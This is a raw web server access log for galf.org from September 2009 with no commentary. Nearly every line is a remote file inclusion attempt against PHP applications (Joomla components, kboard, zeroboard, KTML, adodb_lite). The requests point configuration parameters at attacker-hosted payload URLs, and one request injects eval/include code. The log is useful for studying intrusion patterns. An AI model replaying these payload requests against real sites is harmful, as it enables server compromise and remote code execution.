116.125.113.119 - - [20/Sep/2009:17:00:59 -0700] "GET /logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
116.125.113.119 - - [20/Sep/2009:17:01:11 -0700] "GET /logs/access_090420.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
116.125.113.119 - - [20/Sep/2009:17:01:11 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
116.125.113.119 - - [20/Sep/2009:17:01:11 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.79.25.248 - - [20/Sep/2009:17:07:46 -0700] "GET /logs/about.php?_SERVER[DOCUMENT_ROOT]=http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
77.79.25.248 - - [20/Sep/2009:17:07:46 -0700] "GET /about.php?_SERVER[DOCUMENT_ROOT]=http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
116.125.113.119 - - [20/Sep/2009:17:11:08 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
116.125.113.119 - - [20/Sep/2009:17:11:08 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
116.125.113.119 - - [20/Sep/2009:17:11:08 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
204.200.197.136 - - [20/Sep/2009:17:12:29 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.geocities.com/cool_sasuke_uchiha/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.200.197.136 - - [20/Sep/2009:17:12:30 -0700] "GET /logs/access.log%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.geocities.com/cool_sasuke_uchiha/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.200.197.136 - - [20/Sep/2009:17:12:30 -0700] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.geocities.com/cool_sasuke_uchiha/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.200.197.136 - - [20/Sep/2009:17:12:46 -0700] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.geocities.com/cool_sasuke_uchiha/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.200.197.136 - - [20/Sep/2009:17:12:46 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.geocities.com/cool_sasuke_uchiha/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.200.197.136 - - [20/Sep/2009:17:12:46 -0700] "GET /logs/access.log%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.geocities.com/cool_sasuke_uchiha/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:17:13:12 -0700] "GET /Clickheat_Heatmap.phpjoomla%20mambohttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:17:13:12 -0700] "GET /logs/Clickheat_Heatmap.phpjoomla%20mambohttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
204.200.197.136 - - [20/Sep/2009:17:13:14 -0700] "GET /logs/access_090518.log%20%20//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.geocities.com/cool_sasuke_uchiha/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.200.197.136 - - [20/Sep/2009:17:13:14 -0700] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.geocities.com/cool_sasuke_uchiha/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.200.197.136 - - [20/Sep/2009:17:13:21 -0700] "GET /logs//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.geocities.com/cool_sasuke_uchiha/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.200.197.136 - - [20/Sep/2009:17:13:21 -0700] "GET /logs/access_090518.log%20%20//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.geocities.com/cool_sasuke_uchiha/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.200.197.136 - - [20/Sep/2009:17:13:21 -0700] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.geocities.com/cool_sasuke_uchiha/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [20/Sep/2009:17:14:08 -0700] "GET /PhpLinkExchange/bits_listings.php?svr_rootP=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [20/Sep/2009:17:14:08 -0700] "GET /logs/access.log%20%20//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [20/Sep/2009:17:14:08 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.200.197.136 - - [20/Sep/2009:17:14:40 -0700] "GET /logs/access_090427.log%20%20//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.geocities.com/cool_sasuke_uchiha/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
118.129.166.10 - - [20/Sep/2009:17:15:33 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.semihow.com/sh/amboard/compile/default_basic/admin/mydb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
118.129.166.10 - - [20/Sep/2009:17:15:36 -0700] "GET /skin/zero_vote/error.php?dir=http://www.semihow.com/sh/amboard/compile/default_basic/admin/mydb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
118.129.166.10 - - [20/Sep/2009:17:15:36 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.semihow.com/sh/amboard/compile/default_basic/admin/mydb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
87.227.99.68 - - [20/Sep/2009:17:16:01 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://fpappalardo.com/logs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.227.99.68 - - [20/Sep/2009:17:16:01 -0700] "GET /logs/access_090601.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://fpappalardo.com/logs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.227.99.68 - - [20/Sep/2009:17:16:01 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://fpappalardo.com/logs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.227.99.68 - - [20/Sep/2009:17:16:01 -0700] "GET /logs/access_090622.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://fpappalardo.com/logs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [20/Sep/2009:17:16:26 -0700] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.oldnewrock.ru/sponsors/.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [20/Sep/2009:17:16:26 -0700] "GET /logs/access_090223.log%20%20//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.oldnewrock.ru/sponsors/.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [20/Sep/2009:17:16:26 -0700] "GET /bbs/include/print_category.php?setup[use_category]=1&dir=http://www.oldnewrock.ru/sponsors/.cache/one.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [20/Sep/2009:17:16:34 -0700] "GET /logs/access_090622.log%20%20//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.oldnewrock.ru/sponsors/.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.200.197.136 - - [20/Sep/2009:17:16:54 -0700] "GET /logs/access_090518.log//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.geocities.com/cool_sasuke_uchiha/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.200.197.136 - - [20/Sep/2009:17:18:18 -0700] "GET /logs/access_090518.log//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.geocities.com/cool_sasuke_uchiha/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:17:18:35 -0700] "GET /?mosConfig_absolute_path=%20online%20shophttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:17:18:35 -0700] "GET /logs/?mosConfig_absolute_path=%20online%20shophttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.galf.org"
208.64.216.6 - - [20/Sep/2009:17:20:21 -0700] "GET /logs/access_090601.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://fpappalardo.com/logs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.64.216.6 - - [20/Sep/2009:17:20:21 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://fpappalardo.com/logs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.64.216.6 - - [20/Sep/2009:17:20:21 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://fpappalardo.com/logs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.64.216.6 - - [20/Sep/2009:17:20:22 -0700] "GET /logs/access_090622.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://fpappalardo.com/logs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
118.129.166.10 - - [20/Sep/2009:17:20:25 -0700] "GET /logs//sources/functions.php?CONFIG[main_path]=http://www.semihow.com/sh/amboard/compile/default_basic/admin/mydb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
118.129.166.10 - - [20/Sep/2009:17:20:25 -0700] "GET /logs/access.log%20%20//sources/functions.php?CONFIG[main_path]=http://www.semihow.com/sh/amboard/compile/default_basic/admin/mydb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
118.129.166.10 - - [20/Sep/2009:17:20:34 -0700] "GET /sources/functions.php?CONFIG[main_path]=http://www.semihow.com/sh/amboard/compile/default_basic/admin/mydb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
77.222.40.247 - - [20/Sep/2009:17:22:22 -0700] "GET /?mosConfig_absolute_path=%20online%20shophttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "galf.org"
77.222.40.247 - - [20/Sep/2009:17:22:23 -0700] "GET /logs/?mosConfig_absolute_path=%20online%20shophttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "galf.org"
200.101.70.1 - - [20/Sep/2009:17:24:17 -0700] "GET /swf/?sourcedir=http://www.unixcrew.de/fjear1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
200.101.70.1 - - [20/Sep/2009:17:24:17 -0700] "GET /logs/access_090706.log//swf/?sourcedir=http://www.unixcrew.de/fjear1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
200.101.70.1 - - [20/Sep/2009:17:24:17 -0700] "GET /swf/?sourcedir=http://www.unixcrew.de/fjear1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
200.101.70.1 - - [20/Sep/2009:17:24:17 -0700] "GET /logs//swf/?sourcedir=http://www.unixcrew.de/fjear1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
200.101.70.1 - - [20/Sep/2009:17:24:17 -0700] "GET /logs/access_090706.log//swf/?sourcedir=http://www.unixcrew.de/fjear1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
200.101.70.1 - - [20/Sep/2009:17:24:17 -0700] "GET /logs//swf/?sourcedir=http://www.unixcrew.de/fjear1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [20/Sep/2009:17:24:42 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://wett-profis.com/guestbook/zfxid.txt?? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [20/Sep/2009:17:24:42 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://wett-profis.com/guestbook/zfxid.txt?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [20/Sep/2009:17:25:20 -0700] "GET /logs/access.log//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.oldnewrock.ru/sponsors/.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.93.2.80 - - [20/Sep/2009:17:26:24 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.4pppp.com/icon1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
219.93.2.80 - - [20/Sep/2009:17:26:24 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.4pppp.com/icon1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
219.93.2.80 - - [20/Sep/2009:17:26:24 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.4pppp.com/icon1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
81.169.138.128 - - [20/Sep/2009:17:26:26 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
81.169.138.128 - - [20/Sep/2009:17:26:26 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
81.169.138.128 - - [20/Sep/2009:17:26:26 -0700] "GET /logs/access.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
81.169.138.128 - - [20/Sep/2009:17:27:15 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.169.138.128 - - [20/Sep/2009:17:27:18 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.169.138.128 - - [20/Sep/2009:17:27:18 -0700] "GET /logs/access_090622.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [20/Sep/2009:17:28:53 -0700] "GET /logs///appserv/main.php?appserv_root=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [20/Sep/2009:17:28:53 -0700] "GET /logs/access_090601.log%20%20///appserv/main.php?appserv_root=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:17:29:35 -0700] "GET //skin/zero_vote/login.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [20/Sep/2009:17:29:35 -0700] "GET /logs///skin/zero_vote/login.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
200.101.70.1 - - [20/Sep/2009:17:31:03 -0700] "GET /logs/access_090706.log%20%20//swf/?sourcedir=http://www.unixcrew.de/fjear1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
200.101.70.1 - - [20/Sep/2009:17:31:39 -0700] "GET /logs/access_090706.log%20%20//swf/?sourcedir=http://www.unixcrew.de/fjear1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
200.101.70.1 - - [20/Sep/2009:17:32:16 -0700] "GET /logs/access_090629.log%20%20//swf/?sourcedir=http://www.unixcrew.de/fjear1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
200.101.70.1 - - [20/Sep/2009:17:32:17 -0700] "GET /logs/access_090629.log%20%20//swf/?sourcedir=http://www.unixcrew.de/fjear1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [20/Sep/2009:17:33:35 -0700] "GET /logs/access.log//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.4pppp.com/icon1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
118.129.166.10 - - [20/Sep/2009:17:33:47 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.semihow.com/sh/amboard/compile/default_basic/admin/mydb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
118.129.166.10 - - [20/Sep/2009:17:33:47 -0700] "GET /skin/zero_vote/error.php?dir=http://www.semihow.com/sh/amboard/compile/default_basic/admin/mydb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
118.129.166.10 - - [20/Sep/2009:17:33:50 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.semihow.com/sh/amboard/compile/default_basic/admin/mydb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
219.93.2.80 - - [20/Sep/2009:17:33:56 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.4pppp.com/icon1.gif?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
222.234.2.107 - - [20/Sep/2009:17:34:31 -0700] "GET /kboard.php?http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:17:34:35 -0700] "GET //skin/zero_vote/login.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [20/Sep/2009:17:34:35 -0700] "GET /logs///skin/zero_vote/login.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [20/Sep/2009:17:34:35 -0700] "GET /logs/access.log%20%20///skin/zero_vote/login.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
210.205.6.233 - - [20/Sep/2009:17:34:45 -0700] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.4pppp.com//icon1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
210.205.6.233 - - [20/Sep/2009:17:34:45 -0700] "GET /logs/access.log//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.4pppp.com//icon1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
210.205.6.233 - - [20/Sep/2009:17:34:45 -0700] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.4pppp.com//icon1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
200.101.70.1 - - [20/Sep/2009:17:40:04 -0700] "GET /forum/?sourcedir=http://www.unixcrew.de/fjear1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
200.101.70.1 - - [20/Sep/2009:17:40:04 -0700] "GET /logs//forum/?sourcedir=http://www.unixcrew.de/fjear1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
200.101.70.1 - - [20/Sep/2009:17:40:04 -0700] "GET /logs/access_090302.log%20%20//forum/?sourcedir=http://www.unixcrew.de/fjear1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:17:41:15 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
81.169.138.128 - - [20/Sep/2009:17:41:19 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [20/Sep/2009:17:41:24 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [20/Sep/2009:17:41:24 -0700] "GET /logs/access.log%20%20//skin/zero_vote/ask_password.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
118.129.166.10 - - [20/Sep/2009:17:42:43 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.semihow.com/sh/amboard/compile/default_basic/admin/mydb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
118.129.166.10 - - [20/Sep/2009:17:42:43 -0700] "GET /logs/access_090406.log%20%20//skin/zero_vote/error.php?dir=http://www.semihow.com/sh/amboard/compile/default_basic/admin/mydb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
118.129.166.10 - - [20/Sep/2009:17:42:55 -0700] "GET /skin/zero_vote/error.php?dir=http://www.semihow.com/sh/amboard/compile/default_basic/admin/mydb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.168.11.101 - - [20/Sep/2009:17:44:17 -0700] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
200.101.70.1 - - [20/Sep/2009:17:45:45 -0700] "GET /forum/?sourcedir=http://www.unixcrew.de/fjear1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
200.101.70.1 - - [20/Sep/2009:17:45:45 -0700] "GET /logs//forum/?sourcedir=http://www.unixcrew.de/fjear1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
200.101.70.1 - - [20/Sep/2009:17:45:45 -0700] "GET /logs/access_090302.log%20%20//forum/?sourcedir=http://www.unixcrew.de/fjear1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
116.125.113.119 - - [20/Sep/2009:17:48:40 -0700] "GET /logs/access.log//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
116.125.113.119 - - [20/Sep/2009:17:48:40 -0700] "GET /logs//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
116.125.113.119 - - [20/Sep/2009:17:48:40 -0700] "GET /components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
118.129.166.10 - - [20/Sep/2009:17:48:45 -0700] "GET /skin/zero_vote/error.php?dir=http://www.semihow.com/sh/amboard/compile/default_basic/admin/mydb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
118.129.166.10 - - [20/Sep/2009:17:48:45 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.semihow.com/sh/amboard/compile/default_basic/admin/mydb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
77.222.40.247 - - [20/Sep/2009:17:48:46 -0700] "GET /logs/Savant2_Plugin_options.php?mosConfig_absolute_path=%20joomla%20mambohttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:17:48:46 -0700] "GET /Savant2_Plugin_options.php?mosConfig_absolute_path=%20joomla%20mambohttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
118.129.166.10 - - [20/Sep/2009:17:48:48 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.semihow.com/sh/amboard/compile/default_basic/admin/mydb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [20/Sep/2009:17:49:06 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [20/Sep/2009:17:49:06 -0700] "GET /logs/access.log%20%20//skin/zero_vote/ask_password.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [20/Sep/2009:17:49:06 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
118.129.166.10 - - [20/Sep/2009:17:50:34 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.semihow.com/sh/amboard/compile/default_basic/admin/mydb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
118.129.166.10 - - [20/Sep/2009:17:50:38 -0700] "GET /skin/zero_vote/error.php?dir=http://www.semihow.com/sh/amboard/compile/default_basic/admin/mydb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
